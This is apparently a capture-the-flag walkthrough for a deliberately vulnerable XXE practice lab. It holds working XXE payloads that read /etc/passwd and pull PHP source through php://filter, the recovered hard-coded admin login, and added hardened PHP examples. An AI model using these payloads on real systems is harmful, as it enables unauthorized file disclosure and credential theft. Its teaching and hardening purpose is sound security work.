Download
https://www.vulnhub.com/entry/xxe-lab-1,254/
Scan the subnet to find the target's IP address
nmap 192.168.112.0/24
Enumerate directories
dirb http://192.168.112.131/
Check robots.txt
It discloses the xxe/admin.php path; opening it leads to a new page
Capture the login request and replace the body with the following XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]>
<root><name>&b;</name><password>asdadsad</password></root>
XXE is confirmed: the response echoes /etc/passwd, which shows a user named r00t
Next, try to read the xxe.php source through the php://filter wrapper
<!DOCTYPE a [<!ENTITY b SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">]>
Base64-decode the response to get the source
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$info = simplexml_import_dom($dom);
$name = $info->name;
$password = $info->password;
echo "Sorry, this $name not available!";
?>
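The decoded xxe.php above is vulnerable for two reasons: it re-enables the external entity loader, and it parses untrusted input with LIBXML_NOENT | LIBXML_DTDLOAD, so a SYSTEM entity in an inline DTD is resolved and substituted into the document. The following is an added example (not the lab's code) that places that handler beside a hardened version; the function names parse_vulnerable and parse_hardened and the sample documents are our own.

```php
<?php
// Added example, not part of the lab. Shows the lab's parsing logic next to
// a hardened version of the same handler.

// VULNERABLE: mirrors xxe.php. LIBXML_NOENT substitutes entities and
// LIBXML_DTDLOAD loads the DTD, so <!ENTITY b SYSTEM "file:///..."> is
// expanded and its content ends up in $info->name.
function parse_vulnerable(string $xml): string
{
    libxml_disable_entity_loader(false);
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    $info = simplexml_import_dom($dom);
    return (string) $info->name;
}

// HARDENED:
//  1. refuse any document that carries a DOCTYPE at all, so no inline DTD and
//     therefore no entity declarations can reach the parser;
//  2. parse without LIBXML_NOENT / LIBXML_DTDLOAD and with LIBXML_NONET, so a
//     document that somehow slipped past the check still cannot resolve
//     external entities or fetch anything over the network;
//  3. on PHP < 8.0 also call libxml_disable_entity_loader(true) (the function
//     is deprecated in 8.0, where the loader is off unless LIBXML_NOENT is set).
function parse_hardened(string $xml): ?string
{
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        // Reject and log: a DOCTYPE has no business in this API's input.
        error_log('rejected XML with DOCTYPE from ' . ($_SERVER['REMOTE_ADDR'] ?? 'cli'));
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$ok) {
        return null;
    }
    $info = simplexml_import_dom($dom);
    return isset($info->name) ? (string) $info->name : null;
}

// Constructed sample inputs: the payload from the write-up and a benign one.
$malicious = '<?xml version="1.0" encoding="UTF-8"?>'
    . '<!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]>'
    . '<root><name>&b;</name><password>x</password></root>';
$benign = '<?xml version="1.0" encoding="UTF-8"?>'
    . '<root><name>alice</name><password>x</password></root>';

var_dump(parse_hardened($malicious)); // NULL: rejected before parsing
var_dump(parse_hardened($benign));    // string(5) "alice"
```

The DOCTYPE check is a cheap first line of defence, but the parser flags are what actually matter: the flag never to pass on attacker-controlled XML is LIBXML_NOENT, which is exactly what the lab's handler does.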
Read admin.php the same way and review the decoded source
Base64-decoding it reveals the hard-coded username and password hash
<?php
session_start();
?>
<html lang = "en">
<head>
<title>admin</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {padding-top: 40px;padding-bottom: 40px;background-color: #ADABAB;}
.form-signin {max-width: 330px;padding: 15px;margin: 0 auto;color: #017572;}
.form-signin .form-signin-heading,.form-signin .checkbox {margin-bottom: 10px;}
.form-signin .checkbox {font-weight: normal;}
.form-signin .form-control {position: relative;height: auto;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;padding: 10px;font-size: 16px;}
.form-signin .form-control:focus {z-index: 2;}
.form-signin input[type="email"] {margin-bottom: -1px;border-bottom-right-radius: 0;border-bottom-left-radius: 0;border-color:#017572;}
.form-signin input[type="password"] {margin-bottom: 10px;border-top-left-radius: 0;border-top-right-radius: 0;border-color:#017572;}
h2{text-align: center;color: #017572;}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
    if ($_POST['username'] == 'administhebest' && md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
        $_SESSION['valid'] = true;
        $_SESSION['timeout'] = time();
        $_SESSION['username'] = 'administhebest';
        echo "You have entered valid use name and password <br />";
        $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
        echo $flag;
    } else {
        $msg = 'Maybe Later';
    }
}
?>
</div>
<!-- W00t/W00t -->
<div class = "container">
<form class = "form-signin" role = "form" action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control" name = "username" required autofocus></br>
<input type = "password" class = "form-control" name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit" name = "login">Login</button>
</form>
Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
</div>
</body>
</html>
administhebest
admin@123
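The login check in admin.php has three weaknesses worth naming: the username and an unsalted MD5 digest are hard-coded in a file that the XXE bug can read, the digest is compared with loose ==, and the next step (the flagmeout.php link) is echoed to whoever authenticates. The block below is an added example, not the lab's code, of how that check should look; the environment variable names ADMIN_USER and ADMIN_PASSWORD_HASH and the function names are placeholders of our own.

```php
<?php
// Added example, not part of the lab: a hardened replacement for the login
// check in admin.php. Credentials come from the environment (placeholder
// variable names), never from the PHP source itself.

function load_admin_credentials(): array
{
    $user = getenv('ADMIN_USER');
    $hash = getenv('ADMIN_PASSWORD_HASH'); // output of password_hash()
    if ($user === false || $hash === false) {
        throw new RuntimeException('admin credentials are not configured');
    }
    return ['user' => $user, 'hash' => $hash];
}

function check_login(string $user, string $password): bool
{
    $cred = load_admin_credentials();
    // hash_equals() compares in constant time; password_verify() handles the
    // salt and is constant-time as well. Both run on every request so that the
    // response timing does not reveal which of the two failed.
    $userOk = hash_equals($cred['user'], $user);
    $passOk = password_verify($password, $cred['hash']);
    return $userOk && $passOk;
}

session_start();
$msg = '';
if (isset($_POST['login'], $_POST['username'], $_POST['password'])) {
    if (check_login((string) $_POST['username'], (string) $_POST['password'])) {
        session_regenerate_id(true);   // new session id after privilege change
        $_SESSION['valid'] = true;
        $_SESSION['timeout'] = time();
        $_SESSION['username'] = (string) $_POST['username'];
        $msg = 'Login successful';
    } else {
        // Same generic message for a wrong username and a wrong password.
        $msg = 'Maybe Later';
    }
}
// $msg is later rendered through htmlspecialchars() in the form, not echoed raw.
```

To produce the stored value once, run something like php -r 'echo password_hash("your-secret", PASSWORD_DEFAULT);' and place the result in the environment or in a config file outside the web root, so that an arbitrary-file-read bug such as the XXE above cannot hand over a reusable credential.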
Log in at admin.php with those credentials
The flag is in the page source of flagmeout.php
Decode the flag in CyberChef
It decodes to the path /etc/.flag.php
Use the same XXE payload with the php://filter wrapper to read /etc/.flag.php
Base64-decode the result
Save the decoded content to a .php file, prepend the <?php tag, and open it in a browser to obtain the flag